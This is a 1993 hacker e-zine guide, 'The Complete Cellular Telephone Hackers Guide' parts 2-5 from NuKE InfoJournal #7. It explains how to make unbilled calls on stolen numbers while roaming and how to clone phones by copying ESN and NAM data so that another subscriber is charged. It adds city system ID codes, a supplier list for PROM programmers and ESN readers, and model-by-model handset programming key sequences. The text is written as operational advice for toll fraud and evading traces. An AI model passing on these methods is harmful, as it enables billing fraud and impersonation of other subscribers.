93 General Electric 146 92 Goldstar Products 141 8D Harris 137 89 Hitachi 132 84 Hughes Network Systems 164 A4 Hyundai 160 A0 Japan Radio Co., Ltd. 152 98 Kokusai 139 8B Mansoor Electronics 167 A7 Mobira 156 9C Motorola 130 82 Motorola International 168 A8 Mitsubishi 134 86 Murata Machinery 144 90 NEC 135 87 Nokia 165 A5 Novatel 142 8E OKI 129 81 Panasonic (Matsushita) 136 88 Philips Circuit Assemblies 171 AB Philips Telecom 170 AA Qualcomm 159 9F Samsunq Corp. 179 B0 Sanyo 175 AF Satellite Technology Services 161 A1 Shintom West 174 AE Sony Corp. 154 9A Tama Denki Co. 155 9B Technophone 162 A2 Uniden Corp. of America 172 AC Uniden Corp. of Japan 173 AD Universal Cellular 149 95 Yupiteru Industries 163 A3 ================================================================================ ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "The _COMPLETE_ Cellular Telephone Hackers Guide Nu Nu PART 2 KE KE The Hacker's Best Tricks" -N -N OCRd By uK uK The NuKE Crew E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % The ROAMing Technique % Cellular telephones have a ROAM mode, which indicates that the user is in an area other than his or her "home" area. This ability allows the user to place a call in an area away from his own, such as another state, and allows the phone to be used when travelling or commuting. However, it is impossible for the local MTSO to know when an "outsider" is on-line in their area, therefore, incoming calls are not available when ROAMing unless a Call Following feature is activated by the cellular carrier. Cellular carriers have common agreements to cross-bill applicable charges, including extra charges for being an "outsider", when a cellular user takes advantage of the roaming capabilities of a cellular telephone. It is possible for a user to make a call when ROAMing and not be billed. The local area MTSO may put the call through and bill it to the registered user at a later date, only to learn that the caller was using a stolen number. Keep in mind that all call information is recorded and can be traced. It is possible for the authorities to follow up with the "called" party. The calls most frequently followed up on are calls repeatedly made to the same number (the user's home number, family members, friends, etc) and noticeable trends in calling (calling from the same cell each time, calling at the same time of day, the same area, etc.) The "ROAMing Technique" is frequently used, due to the fact that carriers normally will not commit to the time and expense of tracing a call to recoup the small amount lost on short calls (less than one percent of these calls are deemed a sufficient loss to be followed up on). This method requires the NAME be programmed with a fake SIDH (refer to the Home System ID article). This may provide access for a limited time. A smart hacker knows to ignore any message to contact the cellular carrier. % Clone Approach % A cellular phone can also be reprogrammed to imitate another cellular phone. This is done for two reasons. First, the owner of two cellular phones does not want to pay two individual service charges since he only uses one phone at a any given time. Secondly, a hacker wants to make free phone calls that will be charged to another cellular user. This approach will work until the wrongly charged user reports these charges to the carrier at the end of the month when they get their bill. Called numbers will probably be investigated for the source. The entire ESN and NAM (MIN components) are required to accomplish cloning. The NAM parameters of one phone should be programmed into the other. The ESN PROM of the first should be read and programmed into the second. The idea is to make both phones appear to the carrier as the same phone. If an ESN of a particular phone is not known, then a Cellular Service Monitor or ESN Reader will be necessary. Most cellular service centres will have one or you can look in at the Buyer's Guide Article. Only one phone can be used at any given time. Both phones, will try respond to incoming calls. The phone that offers the most powerful link will be connected to break the connection of the other, weaker phone link. Refer to the first part on how to program the ESN/NAM. ================================================================================ ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "The _COMPLETE_ Cellular Telephone Hackers Guide Nu Nu PART 3 KE KE Home System ID Codes (SIDH)" -N -N OCRd By uK uK The NuKE Crew E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % Home System Identification Codes (SIDH) % SYSTEM NON-WIRELINE(A) NON-WIRELINE(B) Abilene, TX 131 422 Aiken, GA 181 084 Akron, OH 073 054 Albany, GA 241 204 Albany, NY 063 078 Alburquerque, NM 079 110 Alexandra, LA 243 212 Allentown, PA 103 008 Alton, IL 017 046 Altoona, PA 247 032 Amarillo, TX 249 422 Anchorage, AK 251 234 Anderson, SC 139 116 Anniston, AL 255 098 Appleton, WI 217 240 Asheville, NC 263 246 Ashland, WV 307 --- Athens, AL 203 198 Athens, GA 041 034 Atlanta, GA 041 034 Atlantic City, NJ 267 250 Auqusta, GA 181 084 Aurora, IL 001 020 Austin, TX 107 164 Bakersfield, CA 183 228 Baltimore, MD 013 018 Bangor, ME 271 254 Baton Rouge, LA 085 106 Battle Creek, MI 403 256 Beaumont, TX 185 012 Bellingham, WA 047 006 Beloit, WI 217 210 Benton Harbor, MI 277 260 Biddeford, ME 501 484 Billings, MT 279 262 Biloxi, MS 281 264 Binghampton, NY 283 266 Birmingham, AL 113 098 Bishop, CA 1063 --- Bismarck, ND 285 268 Bloomington, IL 255 532 Boise, ID 289 272 Boston, MA 007 028 Bradenton, FL 175 042 Bremerton, WA 047 006 Bridgeport, CT 119 088 Bristol, TN 149 042 Brownsville, TX 451 434 Bryan, TX 297 280 Buffalo, NY 003 056 Burlington, NC 069 144 Burlington, VT 313 300 Canton, OH 073 054 Casper, WY 301 284 Cedar Falls, IA 589 568 Cedar Rapids, IA 303 286 Champaign, IL 305 532 Charleston, WV 307 290 Charleston, SC 127 156 Charlotte, NC 139 114 Charlottesville, VA 309 292 Chattanooga, TN 161 148 Chicago, IL 001 020 Cincinatti, OH 051 014 Clarksville, TN 179 296 Cleveland, OH 015 054 College Station, TX 297 280 Colorado Springs, CO 045 180 Columbia, SC 189 182 Columbus, GA 319 302 Columbus, OH 133 138 Corpus Christi, TX 191 184 Council Bluffs, IA 137 152 Cumberland, MD 321 304 Dallas, TX 033 038 Danville, VA 323 306 Davenport, IA 193 186 Dayton, OH 163 134 Daytona Beach, FL 325 308 Decatur, IL 327 532 Dennison, TX 033 038 Denver, CO 045 058 Des Moines, IA 195 150 Detroit, MI 021 010 Dotham, AL 329 312 Dubuque, IA 331 314 Duluth, MN 333 316 Durham, NC 069 144 Eau Claire, WI 335 318 Elgin, IL 001 020 El Paso, TX 097 092 Elkhart, IN 549 530 Elmira, NY 283 266 Enid, OK 341 324 Erie, PA 343 326 Eugene, OR 061 328 Evansville, IN 197 190 Fairbanks, AL --- 1018 Fargo, ND 347 330 Fayettesville, NC 349 100 Fayetteville, AR 607 342 Flint, MI 021 010 Florence, AL 351 334 Florence, SC 377 350 Fort Collins, CO 045 336 Fprt Launderdale, FL 037 024 Fort Myers, FL 355 042 Fort Pierce, FL 037 340 Fort Smith, AR 359 342 Fort Walton Beach, FL 361 344 Fort Wayne, IN 199 080 Fort Worth, TX 033 038 Fresno, CA 153 162 Gainesville, FL 365 348 Gadsden, AL 363 098 Galveston, TX 367 012 Glens Falls, NY 063 078 Grand Froks, ND 371 356 Grand Rapids, MI 021 244 Granite City, IL 017 046 Great Falls, MT 373 358 Greeley, CO 045 360 Green Bay, WI 217 362 Greensboro, NC 095 142 Greenville, SC 139 116 Gulf of Mexica, LA 171 194 Gulfport, MS --- 264 Gunterville, AL 203 198 Hagerstown, MD 381 364 Hamilton, OH 383 366 Harlingen, TX 451 434 Harrisburg, PA 159 096 Hartford, CT 119 088 Hickory, NC 385 368 Hilo, HI 1161 060 Holbrook, AZ 1027 --- Honolulu, HI 167 060 Houma, LA 387 370 Houston, TX 035 012 Huntington, WV 307 196 Huntsville, AL 203 198 Indianapolis, IN 019 080 Iowa City, IA 389 286 Jackson, MI 391 374 Jackson, MS 205 160 Jacksonville, FL 075 136 Jacksonville, NC 393 376 Janesville, WI 217 210 Jerseyville, IL 245 586 Johnson City, TN 149 074 Johnstown, PA 039 032 Joliet, IL 001 020 Joplin, MO 401 384 Juneau, AL --- 1022 Kalamazoo, MI 403 386 Kankakee, IL 001 020 Kansas City, KS/MO 059 052 Kennewick, WA --- 500 Killeen, TX 409 392 Kingsport, TN 149 074 Knoxville, TN 093 104 Kokmo, IN 411 080 LaCross, WI 413 396 Lafayette, IN 415 080 Lafayette, LA 431 414 Lake Charles, LA 417 400 Lakeland, FL 175 042 Lancaster, PA 159 096 Lansing, MI 021 188 Laredo, TX 419 402 Las Cruces, NM 097 404 Las Vegas, NV 211 064 Lawrence, KS 059 406 Lawton, OK 425 408 Lewiston, ME 427 482 Lexington, KY 213 206 Lihue, HI 1157 060 Lincoin, NE 433 416 Little Rock, AR 215 208 Long Branch, NY 173 022 Longview, TX 229 418 Lorain, OH 437 054 Los Angeles, CA 027 002 Louisville, KY 065 076 Lubbock, TX 439 422 Lynchburg, VA 441 424 Macon, GA 443 426 Madison, WI 217 210 Manchster, NH 445 428 Mansfield, OH 447 430 Marchall, TX 229 418 Mayaguez, 449 432 Mcallen, TX 451 434 Medford, OR 061 436 Melbourne, FL 175 068 Memphis, TN 143 062 Miami, FL 037 024 Midland, TX 459 422 Millville, NH --- 250 Milwaukee, WI 005 044 Minneapolis, MN 023 026 Mobile, AL 081 120 Modesto, CA 233 224 Moline, IL 193 186 Monroe, LA 463 440 Monterey, CA 527 126 Montgomery, AL 465 444 Moorehead, ND --- 330 Muncie, IN 467 080 Muskegon, MI 021 448 Nashua, NH 445 428 Nashville, TN 179 118 NE Pennsylvania 103 172 New Bedford, MA 119 028 New Brunswick, NY 173 022 New Haven, CT 119 088 New London, CT 119 088 New Orleans, LA 057 036 Newport News, VA 083 168 New York, NY 025 022 Norfolk, VA 083 168 Ocala, FL 473 348 Odessa, TX 475 422 Oklahoma City, OK 169 146 Olympia, WA 047 006 Omaha, NE 137 152 Orange County, NY 479 486 Orlando, FL 175 068 Ottawa, IL 1177 1178 Oxnard, CA 027 002 Panama City, FL 483 462 Parkersburg, WV 485 032 Pascagoula, MS 487 264 Pasco, WA --- 500 Pensacola, FL 361 120 Peoria, IL 221 214 Petaluma, CA 031 040 Peterburg, VA 071 472 Philadelphia, PA 029 008 Phoenix, AZ 053 048 Pine Bluff, AR 493 208 Pittsburg, PA 039 032 Pittsfield, MA 119 480 Placerville, CA --- 1080 Ponce, PR 497 082 Portland, ME 499 482 Portland, OR 061 030 Portsmouth, NH 501 484 Poughkeepsie, NY 503 486 Providence, RI 119 028 Provo, UT 091 488 Pueblo, CO 045 490 Raliegh, NC 069 144 Rapid City, SD 511 494 Reading, PA 103 008 Redding, CA 513 294 Reno, NV 515 498 Richland, WA 517 500 Richmond, VA 071 170 Roanoke, VA 519 502 Rockester, NH 501 484 Rockester, MN 521 504 Rockester, NY 117 154 Rockford, IL 217 506 Sacramento, CA 129 112 Saginaw, MI 021 389 Salem, OR 061 030 Salina, CA 527 040 Salt Lake City, UT 091 094 San Angelo, TX 529 510 San Antonio, TX 151 122 San Diego, CA 043 004 San Francisco, CA 031 040 San Jose, CA 031 040 San Juan, PR 227 218 Santa Barbara, CA 531 040 Santa Cruz, CA 031 126 Santa Rosa, CA 031 040 Sarasota, FL 175 142 Savanna, GA 539 520 Schenectady, NY 063 078 Scranton, PA 103 172 Seattle, WA 047 006 Sharon, PA 089 126 Sheboygan, WI 543 044 Shreveport, LA 229 220 Sioux City, IA 547 528 Sioux Falls, SD 555 540 South Bend, IA 549 530 Spartanburg, SC 139 116 Spokane, WA 231 222 Springfield, IL 551 532 Springfield, MO 559 546 Springfield, OH 573 134 Springfield, MA 119 188 St. Cloud, MN 553 534 St. Joseph, MO 059 536 St. Louis, MO 017 046 St. Petersburg, FL 175 042 State College, PA 159 032 Stuebenville, OH 039 032 Stocken, CA 233 224 Stroudsburg, PA 103 172 Syracuse, NY 077 086 Tacoma, WA 047 006 Tallahassee, FL 565 544 Tampa, FL 175 042 Temple, TX 409 392 Terre Haute, IN 567 080 Texarkana, TX/AR 229 550 Toledo, OH 021 130 Topeka, KS 059 552 Trenton, PA 029 008 Tucson, AZ 053 140 Tulsa, OK 111 166 ================================================================================ ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "The _COMPLETE_ Cellular Telephone Hackers Guide Nu Nu PART 4 KE KE Buyer's Guide And Publications" -N -N OCRd By uK uK The NuKE Crew E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 [Note: All suppliers are located in the U.S. except where noted. If anyone can supply us with names/address/telephone numbers of cellular component suppliers outside of North America, please send them to us for inclusion in the next InfoJournal. -RS] % Buyer's Guide % Active Electronic Components (* PROM/EPROM/EEPROM Chips *) Tel (403) 235 5300 (Calgary, AB) (* PROM/EPROM/EEPROM Programmers *) Tel (416) 238 8825 (Toronto, ON) (* EPROM UV Erasers *) Tel (514) 256 7538 (Montreal, QC) Tel (613) 728 7900 (Ottawa, ON) Tel (410) 536 5400 (Baltimore, MD) Tel (708) 593 6655 (Chicago, IL) Tel (313) 689 8000 (Detroit, MI) Tel (516) 471 5400 (New York, NY) Tel (609) 273 2700 (Atlantic City, NJ) Tel (408) 727 4550 (San Francisco, CA) Tel (206) 881 8191 (Seattle, WA) Tel (617) 932 4616 (Boston, MA) Tel (800) 363 7601 Allstate Cellular (* Phone Distributor *) 2064 North Bush St. Santa Ana, CA 92706 Tel (714) 547 4663 Fax (714) 547 5089 BP Microsystems (* PROM Programmers *) Tel (714) 461 9430 Bytek Corporation (* Test Equipement, PROM Programmers *) Instruments System Division 508 N.W. 77th Street Boca Raton, FL 33487-1232 Tel (800) 523 1565 Tel (407) 994 3520 Fax (407) 994 3615 Cellular Enterprises (* Cellular Phone Dealer *) Tel (813) 885 7766 Cellular Phone Services, Inc. (* Phone Repairs *) Tel (800) 326 7901 Curtis Electro Devices (* ESN/MIN Readers *) Tel (800) 332 2790 Fax (415) 964 3574 Communication Consultants Co. (* Phone Repairs *) Tel (818) 901 9711 Communication Instruments (* Cellular Service Monitors *) Tel (800) 288 8223 Tel (213) 322 3666 Incredible Technologies (* EPROM Emulator *) Tel (708) 437 2433 Intronics, Inc. (* EPROM Programmers *) P.O. Box 13723 Edwardsville, KS 66113 Tel (913) 422 2094 JDR Microdevices (* PROM/EPROM/EEPROM Chips *) Tel (800) 538 5000 Johnson Radio Communications (* Phone Distributor *) 660 Transfer Road St. Paul, MN 55114 Tel (612) 645 6471 Magnatech Corporation (* Phone Distributor *) 1005 Parchment Drive, S.E. Grand Rapids, MI 49506 Tel (616) 942 9548 National Semiconductors (* PROM/EPROM/EEPROM Chips *) Tel (408) 721 5000 Needham's Electronics (* EPROM Programmers *) 4539 Orange Grove Ave Sacramento, CA 95841 Tel (916) 924 8037 NCI (* Cellular Phone Supplier *) Tel (800) 669 5167 Tel (215) 264 5117 Technical Solutions (* EPROM Emulators *) P.O. Box 462101 Garland, TX 75046-2101 Tel (214) 272 9392 TLC Electronics (* EPROM Emulators *) 2499 Rice St. Ste 17 St. Paul, MN 55113 Tel (612) 481 0287 % Publications % 2600 Magazine (* "The Hacker Quarterly" *) P.O. Box 752 Middle Island, NY 11953 Tel (516) 751 2600 Fax (516) 751 2608 Cellmark Publishing (* SIDH Codes, coverage maps, roamer P.O. Box 261 instructions *) Dearborn, MI 48123 Tel (313) 561 3339 Communications Publishing Co. (* SIDH Codes, coverage maps, area carrier *) P.O. Box 500 Mercer Island, WA 98040-0500 Tel (206) 232 3464 Nuts and Volts Magazine (* Contains a plethora of hardware/technical 430 Princeland Court resources for the serious hacker *) Corona, CA 91719 Tel (909) 371 8497 Fax (909) 371 3052 ================================================================================ ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "The _COMPLETE_ Cellular Telephone Hackers Guide Nu Nu PART 5 KE KE Programming Instructions" -N -N OCRd By uK uK The NuKE Crew E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 MAKE MODEL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ACT 9500 ALPINE 9510 ALPINE 9511 ALPINE 9525 ALPINE 9530 ALPINE 9550 ALPINE 9550 portable AMERICEL ANTEL LNX-100/200 ANTEL NTX-110/220 ANTEL RADIANT 832XL ANTEL RADIANT 950 ANTEL RADIANT 950MX ANTEL STR 300, 350, 330 transportable ANTEL STR 500, 550, 900 ANTEL STR 700, 770 transportable ANTEL STR 1100 portable ANTEL STR 1300 portable ARA PROMCOMM 1600 ASTROTEL AT&T 1100 AT&T 1200/1240 AT&T 1300/1300C AT&T 1400 AT&T 1710 portable AUDIOVOX BC20 AUDIOVOX BC40/BC45 AUDIOVOX BC55 AUDIOVOX BC55A AUDIOVOX CMT 125 AUDIOVOX CMT 400 AUDIOVOX CMT 410 AUDIOVOX CMT 410A AUDIOVOX CMT 500 AUDIOVOX CMT 550 AUDIOVOX CMT 600 AUDIOVOX CMT 1000 AUDIOVOX CMT 1700/1705 AUDIOVOX CMT 3000 AUDIOVOX CTR-1900 transportable AUDIOVOX CTX 1500 AUDIOVOX CTX 2500 AUDIOVOX CTX 3100 AUDIOVOX CTX 3100A AUDIOVOX CTX 4000 AUDIOVOX CTX 4500 portable AUDIOVOX CTX 5000 AUDIOVOX MVX 500 portable AUDIOVOX PT-300 portable AUDIOVOX SP 75/85A BENTLEY BX7 BLAUPUNKT MT 800AU BLAUPUNKT 9000 BLAUPUNKT 9010 CHRYSTLER VISORPHONE CINCINATTI MICROWAVE portable CITICOMM MM1000 CLARION 1100CT CLARION 5100CT CLARION 3000CT CLARION 5200CT CMTELECOM AR3800 DIAMONDTEL MESA 40 DIAMONDTEL MESA 50 DIAMONDTEL MESA 52 DIAMONDTEL MESA 55 DIAMONDTEL MESA 60 portable DIAMONDTEL MESA 60X portable DIAMONDTEL MESA 80X portable DIAMONDTEL MESA 90X portable DIAMONDTEL MESA 92 DIAMONDTEL MESA 95 transportable DIAMONDTEL MESA 99X portable FUJITSU 170 protable/364 FUJITSU COMM 362 FUJITSU COMM II(362A) FUJITSU COMM ILX(364) FUJITSU COMM FX & ST FUJITSU COMM XL FUJITSU F80M-360 FUJITSU POCKET COMMANDER GATEWAY CP 900 portable GE 1000/1500 GE 2000/2500 GE 3000/3500 GE 4000/4500 GE EXECUTIVE GE HOTLINE 5000 GE HOTLINE 7500 GE MINI portable GE MINI II portable GE MONOGRAM GE POCKETFONE GE STAR GOLDSTAR GM/GT 5000 GLENAYRE GL300 GTE BRONZE 200 GTE BRONZE 300 GTE MERCURY 200 GTE MERCURY 300 HITACHI CR-2110H HITACHI CR-1110H HITACHI CR-211H, 2121H HARRIS 4200 celphone HARRIS 4400 HARRISON 4600 HYUNDAI INFINITI JAGUAR E.F. JOHNSON KENWOOD KMP F500/KMP H700 LENEX same as ANTEL LX series LEXUS MOTO LUXCEL LXC/LXM/LXT 450 LUXCEL LXC/LXM/LXT 600 MEI CT2000 MEI CT3000 MEI HT5000 MESA see DIAMONDTEL MESA series MGA 100/200 MITSUBISHI 301/401/450/460 MITSUBISHI 500/555/560/600 MITSUBISHI 700/900/3000 portable MITSUBISHI 800 transportable MITSUBISHI 1500 transportable MOBIRA 300 series, ME 57, ME 57A transportable MOBIRA 400 series transportable, 500 series portable MOTOROLA 750 vers I portable MOTOROLA 750 vers II portable MOTOROLA 950 portable MOTOROLA 950X portable MOTOROLA 1100 MOTOROLA 1500/1500A MOTOROLA 1800 MOTOROLA SCN 2056 (1900) MOTOROLA 2000 MOTOROLA 2000R MOTOROLA 2000X MOTOROLA 2200 MOTOROLA 2600 MOTOROLA 2900 MOTOROLA 3000 MOTOROLA 4000C MOTOROLA 4000X MOTOROLA SCN 2005 (4500L) MOTOROLA SCN 2005 (4500XL) MOTOROLA 5000 MOTOROLA 5000 vers 2 MOTOROLA 6000 MOTOROLA 6000X MOTOROLA SLN 2020A (6000XL) MOTOROLA SLN 2023A (6800XL) MOTOROLA 8000BC portable MOTOROLA 8000BCX portable MOTOROLA 8000P MOTOROLA 8000S MOTOROLA 8000X portable MOTOROLA 8500XL MOTOROLA 9000 MOTOROLA MC 100 MOTOROLA MC 200 MOTOROLA MC 300 MOTOROLA SCN 2005 (MC 400) MOTOROLA SCN 2090/2204 (MC 500) MOTOROLA PERS TEL (with menu key) MOTOROLA PERS TEL (without menu) MOTOROLA TT2 transportable MOTOROLA TT3 transportable MOTOROLA SCN 2090/2204 (TT% transportable) MOTOROLA TT22 transportable MOTOROLA ULTRA CLASSIC MURATA CT50/MCT portable NEC 1000/3500/5000/7000/4700 NEC 3700/3800/4500/4600/4800 NEC 9000/9100 portable NEC P200/P300 portable NEC P400/P600 portable NOKIA 101/1000 portable NOKIA-MOBIRA LX-11/M-11 NOKIA-MOBIRA M-10 NOKIA-MOBIRA P-30 portable NOKIA-MOBIRA P4000/PT612 NOVATEL AURORA 100/200 NOVATEL VTR-8300/9300 NOVATEL 8305 NOVATEL 8320 OKI ACC 91 OKI CSI OKI 21/23 OKI 200/300/400 series OKI 610/630/691/692 OKI 620/693 OKI 700 portable/ACC91/710/750 OKI 810 mobile/891 transportable OKI 830/900 PANASONIC 3500 portable PANASONIC 6104EA/6104EC PANASONIC 6104EB PANASONIC CM/TF 800 PANASONIC EB500/CM500/TP500/EB-T10/EB-C10 PANASONIC EB3500 portable PANASONIC HP600/EBH-30 PANASONIC 6106/6110/EB311/EB362 PIONEER PCM 300/500 PIONEER PCM 600 PRESTIGE PULSAR PHILIPS FM 9210 RADIANT see ANTEL RADIO SHACK CT 102 RADIO SHACK CT 200/201 RADIO SHACK CT 300/301 RADIO SHACK CT 300 portable RADIO SHACK CT 302 RADIO SHACK CT 1033 RADIO SHACK CT 100/101 RADIO SHACK 17-8003 RADIO SHACK 8000 series SHINTOM CM 7600 SHINTOM CM 8700 SHINTOM CM 8800 SHINTOM XR2000/7600 SONY CM-P11 portable STANDARD STS CP832 TACTEL TACTEL TECHNOPHONE PC 105/115/125/135 portable TECHNOPHONE PC 205 portable TECHNOPHONE MC905A/MC905MKII/MC985A/MC9995 TECHNOPHONE MC915A UNIDEN CP-900/1000/1050/1100/1200/1500/1900 UNIDEN CP-2000/3000/PRES4000GTS/4500GTS UNIDEN 5000/6000GTS portable UNIDEN CP-5500 portable USA CORP portable WALKER 910 WALKER portable % Programming Instructions % ------------------------------------------------------------------------------- ALPINE 9500 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Kokusai Programmer: Motorola 1801 -- Celnam, Curtis or Bytek ESN Prefix DEC: 150 HEX: 96 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Horn Alert: Aux New Unlock Code: NAM System Select: NAM (AB or BA) ------------------------------------------------------------------------------- ALPINE 9510 ------------------------------------------------------------------------------- NAM Type: Fujitsu Manufacturer: Fujitsu Programmer: Curtis or Bytek ESN Prefix DEC: 150 HEX: 96 ESN, S/N Match Required: YES Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred Systems: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Horn Alert: F + #(Aux) New Unlock Code: NAM System Select: F + 1 + X X=1 (A then B) X=2 (B then A) X=3 (A only) X=4 (B only) X=5 (Home) ------------------------------------------------------------------------------- ALPINE 9511 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Fujitsu Programmer: Handset ESN Prefix DEC: 150 HEX: 96 ESN, S/N Match Required: Yes Programmable Handset: Yes Available Channels: 832 Programming Sequence: Power On F + LOCK POWER OFF POWER ON #626#7764726 (within 10 seconds) HOLD (*) key until tone stops Enter Data for each step then press STOR Press SEND to write data #Digits System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 08 Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 0 (B) or 1 (A) Group ID Format: 2 XX Lock: 3or4 XXX or XXXX Call Timer: 1 4 (see i) Auto Lock: 1 1 (see ii) Call Restriction: 1 1 (see iii) i. Call Timer - 1 Timer off 2 6-seconds 3 30-seconds 4 60-seconds ii. Auto Lock - 1 Manual Lock, No out 2 Manual Lock, No calls 3 Auto Lock, No out 4 Auto Lock, No calls iii. Call Restriction - 1 No Restriction 2 No Memory Dialing 3 No Long Distance 4 Both 2 and 3 5 Memory Calls only ALPINE 9511 NAMS 2,3,4 Programming Sequences: Power On Unlock Power (if locked) (F) (7) (NAM Number - 2, 3, or 4) (F) (Lock) Power Off Power On Follow Programming Code and Steps from Top Model Horn Alert: F + # (Aux) New Unlock Code: NAM System Select: F + 1 + X X=1 A then B X=2 B then A X=3 A only X=4 B only X=5 Home ------------------------------------------------------------------------------- ALPINE 9525 and 9530 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Fujitsu Programmer: Handset ESN Prefix DEC: 150 HEX: 96 ESN, S/N Match Required: Yes. Manufacturer Prefix + Last 4 or 5 digits Programmable Handset: Yes Available Channels: 832 Programming Sequence: Power On F + LOCK Power Off Power On # + 626 + # + 7764726 (within 10 seconds) Hold (*) key until tone stops Enter data for each step then press STOR Press SEND to write data # of Digits System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 08 (Mobile) or 14 (Portable) Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 1(A) or 0(B) Group ID Format: 2 XX Unlock Code: 3or4 XXX or XXXX Call Timer: 1 4 (i) Auto Lock: 1 1 (ii) Call Restriction: 1 1 (iii) System ID Inhibit #: 5 XXXXX System ID Inhibit #: 5 XXXXX System ID Inhibit #: 5 XXXXX i. Call Timer Increment - 1 Timer Off 2 6-seconds 3 30-seconds 4 60-seconds ii. Auto Lock - 1 Manual Lock, no out 2 Manual Lock, No calls 3 Auto Lock, No out 4 Auto Lock, No calls iii. Call Restriction - 1 No Restriction 2 No Memory Dialing 3 No Long-Distance 4 Both 2 and 3 5 Memory Calls only NAMS 2-4 Programming Sequence: Power On Unlock Power (if locked) F + 7 + NAM 2, 3 or 4 F + LOCK Power Off Power On Follow Programming Code and steps from top example. ------------------------------------------------------------------------------- ALPINE 9550 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Fujitsu Programmer: Handset ESN Prefix DEC: 150 HEX: 96 ESN/Serial Number Match: Yes. Manufacturer prefix + last 4 or 5 digits Programmable Handset: Yes Available Channels: 832 Programming Sequence: Power On F + Lock Power Off Power On # + 626 + # + 7764726 (within 3 seconds) Hold (*) key until tone stops Enter data for each step then press STOR Press SEND to write data # digits System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 14 Initial Paging Channel: 4 0333 or 0334 Access Overload Class: 2 XX Preferred System: 1 1(A) or 0(B) Group ID Format: 2 XX Unlock Code: 3or4 XXX or XXXX Call Timer: 1 4(i) Auto Lock: 1 1(ii) Call Restriction: 1 1(iii) i. Call Timer Increment - 1 Timer Off 2 6-seconds 3 30-seconds 4 60-seconds ii. Auto Lock - 1 Manual Lock, no out 2 Manual Lock, No calls 3 Auto Lock, No out 4 Auto Lock, No calls iii. Call Restriction - 1 No Restriction 2 No Memory Dialing 3 No Long-Distance 4 Both 2 and 3 5 Memory Calls only Programming Sequence: Power On Unlock Phone (if locked) F + 7 + NAM 2, 3 or 4 F + LOCK Power Off Power On Follow Programming Code and steps from above New Unlock Code: NAM System Select: FCN + 1 + X X=1 AB X=2 BA X=3 A only X=4 B only X=5 Home Curent status may be reviewed with RCL/ALT + FCN + 1 ------------------------------------------------------------------------------- AMERICEL ------------------------------------------------------------------------------- See SHINTOM 8000 series Programming Instructions. ------------------------------------------------------------------------------- ANTEL LENEX LNX100, NTX 110, LNX200 and NTX220 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufactuer: General Electric Programmer: Handset ESN Prefix DEC: 146 HEX: 92 ESN, S/N Match Required: Yes Stamped Model Number: 100 series - LENEX 1 200 series - LENEX 2 Available Channels: 832 Programming Sequence: Enter sequence: 04049 + FCN + FCN ESN will be displayed Press SEND to increment Once Parameter has been entered, press SEND to enter step and increment Press END to stroe programmed data in NAM and resume normal operation # digits Area Code: 3 XXX + SEND Mobile Number: 7 XXX-XXXX + SEND System ID Format: 5 XXXXX + SEND Local Use Option: 1 1 + SEND MIN Option: 1 1 + SEND Initial Paging Channel: 4 0333 or 0334 + SEND Access Overload Class: 2 XX + SEND Preferred System: 1 0(B) or 1(A) + SEND Group ID Format: 2 XX + SEND Security Code: 4 XXXXX + SEND Handsfree: 1 0(Disable) + SEND or 1(Enable) + SEND Horn Alert: 1 0(Disable) + SEND or 1(Enable) + SEND Antonomous Registration: 1 0(Disable) + SEND or 1(Enable) + SEND Whereabouts Known: 1 0(Disable) + SEND or 1(Enable) + SEND One-minute Audible Beep: 1 0(Disable) + SEND or 1(Enable) + SEND Continuous Tone: 1 0(Disable) + SENd or 1(Enable) + SEND Dual NAME: 1 0(Disable) + SEND or 1(Enable) + SEND (When Dual NAM is enable, it begins programming again for second NAM) Horn Alert: FCN + 9 New Unlock Code: NAM Systyem Select: FCN + 4 + * or # (to scroll choices) Selections include: Preferred (AB or BA) Altr only (Alternate only A only or B only) 